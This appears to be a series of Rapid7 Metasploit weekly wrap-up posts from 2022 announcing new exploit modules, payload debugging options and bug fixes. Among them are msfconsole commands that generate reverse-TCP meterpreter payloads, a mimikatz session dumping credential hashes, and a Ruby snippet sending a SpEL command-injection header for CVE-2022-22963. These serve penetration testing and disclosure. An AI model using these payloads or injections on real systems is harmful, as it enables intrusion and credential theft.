  • Spring Framework Class property RCE (Spring4Shell) by vleminator, which exploits CVE-2022-22965 – This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a war file, though it may be possible to bypass these limitations later.
  • Powershell Command Adapter from zeroSteiner – This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.

Enhancements and features (4)

  • #16529 from dwelch-r7 – This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:
use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'
to_handler
  • #16538 from adfoster-r7 – The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.
  • #16551 from adfoster-r7 – The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.
  • #16553 from mauvehed – This updates Metasploit’s .github/SECURITY.md file with the latest steps to follow when raising security issues with Rapid7’s open source projects.

Bugs fixed (8)

  • #16485 from jeffmcjunkin – This updates the version check for the exploit/windows/local/s4u_persistence module to allow it to run on later Windows versions.
  • #16491 from adfoster-r7 – This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.
  • #16531 from adfoster-r7 – This fixes a crash in various pihole modules when login authentication is required.
  • #16533 from cdelafuente-r7 – This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with -w 32 or -w 64 – previously these flag values were unintentionally ignored.
  • #16540 from adfoster-r7 – This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.
  • #16542 from sjanusz-r7 – This fixes a bug in msfconsole’s internal book keeping to ensure that closed channels are no longer tracked.
  • #16544 from adfoster-r7 – This updates post module windows/gather/ad_to_sqlite to no longer crash. The module will now additionally store the extracted information as loot.
  • #16560 from Ronni3X – This updates the nessus_connect login functionality to correctly handle the @ symbol being present in the password.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/06/metasploit-wrap-up-154/

VMware Workspace ONE Access RCE

Metasploit Wrap-Up

Community contributor wvu has developed a new Metasploit Module which exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the ‘horizon’ user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official Rapid7 Analysis

WSO2 Arbitrary File Upload to RCE

Our very own Jack Hysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official Rapid7 Analysis

Kiwi Meterpreter Updates – Windows 11 Support

The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably this adds support for Windows 11 when running the creds_all command within a Meterpreter console:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi…
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > sysinfo
Computer        : WIN11-TEST
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : TESTINGDOMAIN
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain         NTLM                           SHA1
--------     ------         ----                           ----
WIN11-TEST$  TESTINGDOMAIN  a133becebb8e22321dbf26bf8d90f398  dbf0ad587f62004306f435903fb3a516da6ba104
... etc etc ...

New module content (3)

Enhancements and features (2)

  • #16445 from dwelch-r7 – The Windows Meterpreter payload now supports a MeterpreterDebugLogging datastore option for logging debug information to a file. Example usage:
use windows/x64/meterpreter_reverse_tcp
set MeterpreterDebugBuild true
set MeterpreterDebugLogging rpath:C:/test/foo.txt
save
generate -f exe -o shell.exe
to_handler
  • #16462 from bcoles – Adds support for armle/aarch64 architectures to gdb_server_exec

Bugs fixed (2)

  • #16526 from jheysel-r7 – The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.
  • #16530 from sjanusz-r7 – This updates the pihole_remove_commands_lpe module to no longer break sessions when running the check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Shelby Pace original https://blog.rapid7.com/2022/04/29/metasploit-wrap-up-153/

Redis Sandbox Escape

Metasploit Wrap-Up

Our very own Jake Baines wrote a module that performs a sandbox escape on Redis versions between 5.0.0 and 6.1.0 and achieves remote code execution as the redis user. Redis installations can be password protected, so this module supports exploiting the vulnerability with and without authentication.

While this module targets Redis software, the vulnerability (CVE-2022-0543) only presents itself on Debian-based Linux distributions due to the Lua package interface remaining enabled. The existence of the Lua package interface means that arbitrary libraries can be loaded and used to evade the protections of the sandbox. This vulnerability has been reported as being exploited in the wild.

Antivirus Enumeration

Thanks to sempervictus we now have a post module for enumerating installed antivirus products on Windows systems. Using either a Meterpreter or shell session, the module detects these installations through WMI queries and saves the information to the database. Some of the data returned includes versioning information, possibly clueing a user in on a potential next target for privilege escalation.

New module content (2)

  • Redis Lua Sandbox Escape by Reginaldo Silva and jbaines-r7, which exploits CVE-2022-0543 – This exploit achieves remote code execution as the redis user via a sandbox escape in several Redis versions distributed through Debian-based Linux distributions.
  • Windows Installed AntiVirus Enumeration by rageltman – This adds a module that enumerates all installed AV products on Windows.

Enhancements and features (1)

Bugs fixed (2)

  • #16450 from ORelio – This updates exploit/multi/vnc/vnc_keyboard_exec to include a delay that increases reliability when getting a shell and typing out long commands.
  • #16509 from adfoster-r7 – This ensures proper escaping of HTML in code blocks that are produced by the info -d command.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/04/22/https-www-rapid7-com-blog-post-2022-04-01-metasploit-weekly-wrap-up-158/

ManageEngine ADSelfService Plus Authenticated RCE

Metasploit Weekly Wrap-Up

This module is pretty exciting for us because it’s for a vulnerability discovered by our very own Rapid7 researchers Jake Baines, Hernan Diaz, Andrew Iwamaye, and Dan Kelly.
The vulnerability allowed for attackers to leverage the "custom script" functionality to execute arbitrary operating system commands whenever domain users reset their passwords.
I won’t go into too much depth though because we have a whole blog post here for you to check out with all the details!
Oh, and I almost forgot to mention this module comes with a brand new jjs_reverse_tcp payload too.

Who watches the watch_queue?

This week we’ve also brought you an LPE for Linux via the watch_queue event notification system.
The module exploits a heap out-of-bounds write in kernel memory in versions prior to 5.18 but keep in mind the module currently only has the appropriate offsets for Ubuntu 20.10 with kernel version 5.13.0-37.

New module content (2)

Enhancements and features (6)

  • #16437 from h00die – Adds ESXi as a recognizable type on ssh_login.
  • #16438 from h00die – Some SMTP servers only give out credentials when prompted. Now, the module option ‘AUTHPROMPT’ exists to indicate whether or not the auth prompt is required by the server.
  • #16446 from zeroSteiner – This updates the code for compatibility with the latest RubySMB 3.1 gem.
  • #16458 from bcoles – The fortios_vpnssl_traversal_creds_leak module has been updated to appropriately attribute the original discoverers of the vulnerability and to credit their original blog post and research presentations.
  • #16476 from bcoles – The tools/dev/msftidy.rb tool has been updated to recommend using CVE datastore references over the cve.mitre.org URL references since this is more maintainable in the long run and will assist transitioning things when CVE transitions to cve.org later this year.
  • #16477 from bcoles – This PR updates several modules to remove hardcoded URL references to the soon to be deprecated cve.mitre.org site, and where applicable, add in CVE references in place of these hardcoded URL references.

Bugs fixed (5)

  • #16318 from heyder – Adds support to old key exchange algorithms in the net/ssh lib by defining the append_all_supported_algorithms to true.
  • #16379 from heyder – Refactored a number of modules to use ssh_client_defaults.
  • #16426 from usiegl00 – This fixes a crash in OSX Meterpreter’s stager caused by mangled dyld functions in MacOS Monterey.
  • #16457 from jmartin-r7 – Recent updates in Rex::Parser::Arguments regressed the ability to have short flags with multiple characters. This restores functionality by updating the spec checks and library code to appropriately parse multiple character short flags and each individual short flag specified in a combined short flag.
  • #16479 from cdelafuente-r7 – Meterpreter’s reg setval command has been updated to allow setting a REG_BINARY key value with the -d option with an arbitrarily long binary blob. Previously, this value was treated as a string which lead to an incorrect value being set in the registry field.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/04/15/metasploit-wrap-up-152/

Meterpreter Debugging

Metasploit Weekly Wrap-Up

A consistent message Metasploit hears from users is that debugging and general logging support could be improved. The gaps in functionality make it difficult for users to understand what happens when things go wrong and for new and existing developers to fix bugs and add new features. The Metasploit team has been trying to improve this in various parts of the framework, the most recent being Meterpreter. Meterpreter payloads now have additional debugging options that can be used to inspect the internal workings of the payload as it is running. These options include MeterpreterDebugLogging, which can be used to select where the log file is placed on the remote machine, and MeterpreterDebugBuild, which controls whether or not the deployed Meterpreter supports debugging. For many Meterpreter builds, the additional debugging information would include large, easily signature-able strings that should not be present for typical operations. For this reason, users on active engagements that do not require additional logging should leave this setting off.

This functionality pairs nicely with the recently added SessionTlvLogging option, which can display the C2 traffic used by Meterpreter. With these options, both the internal state and the individual requests and responses can be inspected to understand what is happening. This should hopefully contribute to making Meterpreter a little less enigmatic.

WordPress Library Improvement

Metasploit contains quite a few modules targeting various WordPress vulnerabilities, many of which are in plugins. Almost all of these modules utilize the common WordPress library that Metasploit provides. This week that library was improved to properly handle target WordPress configurations that do not place the REST API under the standard /index.php/ path. This should improve the reliability of these modules by properly accounting for the target’s configuration.

Enhancements and features (5)

  • #16377 from sjanusz-r7 – The Python Meterpreter payload now supports creation of a debug build with the MeterpreterDebugBuild datastore option. By default logging will be output to the console that the payload was run in. A new MeterpreterDebugLogging datastore option allows writing these log files on the host that ran the payload.
  • #16396 from sjanusz-r7 – The PHP Meterpreter payload now supports creation of a debug build with the MeterpreterDebugBuild datastore option. By default logging will be output to the console the payload was run in. A new MeterpreterDebugLogging datastore option allows for writing these log files on the host that ran the payload.
  • #16411 from jmartin-r7 – Improves the RPC analyze host functionality to return additional module suggestion metadata such as invalid options or missing module requirements.
  • #16418 from adfoster-r7 – This adds the boilerplate for placing the debugging Meterpreter sessions wiki page to the docs site.
  • #16451 from dwelch-r7 – This ensures that if MeterpreterDebugBuild is enabled, that the debug versions of the extensions are also used. This allows extensions can now also output debug messages visible via tools such as dbgview, which can be helpful when debugging payloads or Meterpreter extensions.

Bugs fixed (2)

  • #16221 from gwillcox-r7 – This fixes WordPress support to work with sites where the REST API is not under /index.php/.
  • #16455 from adfoster-r7 – This removed the requirement for railgun support in modules that used the Post::File mixin, enabling better identification of modules usable against an existing session.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2022/04/08/metasploit-wrap-up-151/

Windows Local Privilege Escalation for standard users

Metasploit Wrap-Up

In this week’s release, we have an exciting new module that has been added by our very own Grant Willcox which exploits (CVE-2022-26904)[https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904], and allows for normal users to execute code as NT AUTHORITY/SYSTEM on Windows machines from Windows 7 up to and including Windows 11. Currently, the vulnerability is still not patched and there have not been any updates from MSRC regarding this vulnerability, however it may be patched in the next Patch Tuesday.

This exploit requires more than one local user to be present on the machine and the PromptOnSecureDesktop setting to be set to 1, which is the default setting.

MacOS exploitation

Our very own space-r7 has updated the recent GateKeeper module to add support for the recent CVE-2022-22616, which can be used to target all MacOS Catalina versions, and MacOS Monterey versions prior to 12.3.

This module can be used to remove the com.apple.quarantine extended attribute on a downloaded/extracted file and allows for code to be executed on the machine.

Enumerating Chocolatey applications

This week’s release also features a new module from a first-time contributor rad10, which will enumerate all applications that have been installed using Chocolatey.

This could be used when gathering information about a compromised target and potentially vulnerable software present on the machine.

New module content (5)

  • User Profile Arbitrary Junction Creation Local Privilege Elevation by Grant Willcox and KLINIX5, which exploits CVE-2022-26904 – This adds an exploit for CVE-2022-26904, which is an LPE vulnerability affecting Windows 7 through Windows 11. Leveraging this vulnerability can allow a local attacker running as a standard user, who has knowledge of another standard user’s credentials, to execute code as NT AUTHORITY\SYSTEM. The PromptOnSecureDesktop setting must also be set to 1 on the affected machine for this exploit to work, which is the default setting.
  • ALLMediaServer 1.6 SEH Buffer Overflow by Hejap Zairy Al-Sharif, which exploits CVE-2022-28381 – A new module has been added in which exploits CVE-2022-28381, a remotely exploitable SEH buffer overflow vulnerability in AllMediaServer version 1.6 and prior. Successful exploitation results in remote code execution as the user running AllMediaServer.
  • Windows Gather Installed Application Within Chocolatey Enumeration by Nick Cottrell – This adds a post module that enumerates applications installed with Chocolatey on Windows systems.
  • #16082 from usiegl00 – This updates the shadow_mitm_dispatcher module by adding a new RubySMB Dispatcher, whichallows a better integration with RubySMB and enables the use of all the features provided by its client. Both SMBv2 and SMBv3 are now supported.
  • #16401 from space-r7 – This change adds support for CVE-2022-22616 to the existing Gatekeeper bypass exploit module which reportedly covers macOS Catalina all the way to MacOS Monterey versions below 12.3. Since this now targets two CVEs, we’ve introduced a new CVE option to select which CVE to exploit. This default is the most recent CVE.

Enhancements and features (4)

  • #15972 from sempervictus – This updates the Log4shell scanner with the LEAK_PARAMS option, providing a way to leak more target information such as environment variables.
  • #16320 from dwelch-r7 – This updates Windows Meterpreter payloads to support a new MeterpreterDebugBuild datastore option. When set to true the generated payload will have additional logging support which is visible via Window’s DbgView program.
  • #16373 from adfoster-r7 – Adds initial support for Ruby 3.1
  • #16403 from sempervictus – This adds more checks to the post/windows/gather/checkvm module to better detect if the current target is a Qemu / KVM virtual machine.

Bugs fixed (3)

  • #16398 from jmartin-r7 – A number of recent payload adds did not conform to the patterns used for suggesting spec configurations. Tests for these payloads have now been manually added to ensure they will be appropriately tested as part of rspec checks.
  • #16408 from rtpt-alexanderneumann – This fixes an edge case with the multi/postgres/postgres_copy_from_program_cmd_exec module, which crashed when the randomly generated table name started with a number
  • #16419 from adfoster-r7 – A bug has been fixed whereby when using the search command and searching by disclosure_date, the help menu would instead appear. This has been remedied by improving the date handling logic for the search command.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/

CVE-2022-22963 – Spring Cloud Function SpEL RCE

Metasploit Weekly Wrap-Up

A new exploit/multi/http/spring_cloud_function_spel_injection module has been developed by our very own Spencer McIntyre which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to Spring4Shell CVE-2022-22965, which is a separate vulnerability in the WebDataBinder component of Spring Framework.

This exploit works by crafting an unauthenticated HTTP request to the target application. When the spring.cloud.function.routing-expression HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the CVE-2022-22963 Metasploit module:

res = send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(datastore['TARGETURI']),
    'headers' => {
    'spring.cloud.function.routing-expression' => "T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub("'", "''")}'})"
    }
)

Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message

New module content (1)

  • Spring Cloud Function SpEL Injection by Spencer McIntyre, hktalent, and m09u3r, which exploits CVE-2022-22963 – This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to 3.1.7 and 3.2.3.

Bugs fixed (2)

  • #16364 from zeroSteiner – This adds a fix for a crash in auxiliary/spoof/dns/native_spoofer and adds documentation for the module.
  • #16386 from adfoster-r7 – Fixes a crash when running the exploit/multi/misc/java_rmi_server module against at target server, such as Metasploitable2

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).